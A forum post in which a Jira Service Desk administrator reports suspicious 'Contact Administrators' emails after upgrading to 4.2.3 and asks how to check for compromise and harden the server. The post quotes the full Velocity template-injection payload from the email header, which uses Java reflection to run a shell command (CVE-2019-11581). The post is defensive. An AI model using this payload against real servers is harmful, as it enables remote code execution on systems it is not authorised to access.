I idid upgrade our Jira Servicedesk instance to version 4.2.3 on 12. July.
But we received a couple of strange emails which seem to show attack attempts:
Message body says:
New message from Contact Administrators page
But the the message header contains code
[QDOSE Support] #set ($cmd="bash /tmp/baby") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $scan.next() #end
It looks like somebody tried to exploit vulnerability
CVE-2019-11581 - Template injection in various resources
How can we check if that attempt was successful or not?
Any recommendations how to make it more secure?
Thank you
Michael
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.